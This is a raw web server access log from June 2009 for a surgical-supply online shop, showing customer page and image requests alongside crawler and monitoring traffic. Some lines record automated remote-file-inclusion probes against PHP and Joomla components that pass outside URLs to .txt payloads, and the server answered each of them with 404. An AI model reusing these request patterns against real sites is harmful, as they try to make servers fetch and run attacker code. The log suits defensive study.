85.10.128.219 - - [04/Jun/2009:00:59:23 -0400] "GET /logs/access_log.Q109052100%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.85.236.138 - - [04/Jun/2009:01:00:13 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [04/Jun/2009:01:00:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.196.124.252 - - [04/Jun/2009:01:00:54 -0400] "GET /logs//include.php?path[docroot]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:00:54 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:00:54 -0400] "GET //include.php?path[docroot]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
80.81.159.20 - - [04/Jun/2009:01:01:57 -0400] "GET /logs/access_log.Q108070600 HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.135.96.34 - - [04/Jun/2009:01:01:58 -0400] "GET /logs/access_log.Q108070600 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.67.54 - - [04/Jun/2009:01:02:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF4017E10700609D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.196.124.252 - - [04/Jun/2009:01:02:27 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:01:02:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L105786420F82870045DE00G+M37+ENG HTTP/1.1" 200 45037 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057854501525700F72E00G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:02:54 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105786420F82870045DE00G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
81.196.124.252 - - [04/Jun/2009:01:03:06 -0400] "GET /logs/access_log.Q109050700%20%20//include.php?path[docroot]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:01:03:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017A14A1542C000AD7E05B+M37+ENG HTTP/1.1" 200 43038 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105786420F82870045DE00G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:03:11 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A14A1542C000AD7E05B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
211.189.18.73 - - [04/Jun/2009:01:03:25 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:25 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:29 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:29 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:36 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:36 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:38 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:03:38 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:03:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:03:49 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:03:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:01:04:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017A14C1C022000B81E05B+M37+ENG HTTP/1.1" 200 48578 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A14A1542C000AD7E05B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:04:11 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017A14C1F123000EF3E05B+M37+ENG HTTP/1.1" 200 40517 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A14C1C022000B81E05B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:04:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017A14613021000F56E05B+M37+ENG HTTP/1.1" 200 40458 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A14C1F123000EF3E05B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:13 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A14613021000F56E05B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:14 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD HTTP/1.1" 200 30796 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:15 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:05:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L105785410CB22700146E00G+WSEQ(S0020):1+OKEY(A0190):001316592000S0090228+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
89.188.129.126 - - [04/Jun/2009:01:05:29 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:05:29 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:05:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.79.47.122 - - [04/Jun/2009:01:05:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
220.79.47.122 - - [04/Jun/2009:01:05:52 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/space.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:06:06 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
124.186.84.66 - - [04/Jun/2009:01:06:50 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:06:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:06:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:06:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.6.8.112 - - [04/Jun/2009:01:07:20 -0400] "GET /logs/error_log.Q108080800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.186.84.66 - - [04/Jun/2009:01:07:37 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 50278 "http://www.acesurgical.com/caso4.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:39 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:39 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:39 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:40 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:40 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:40 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:41 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:41 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:41 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:07:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
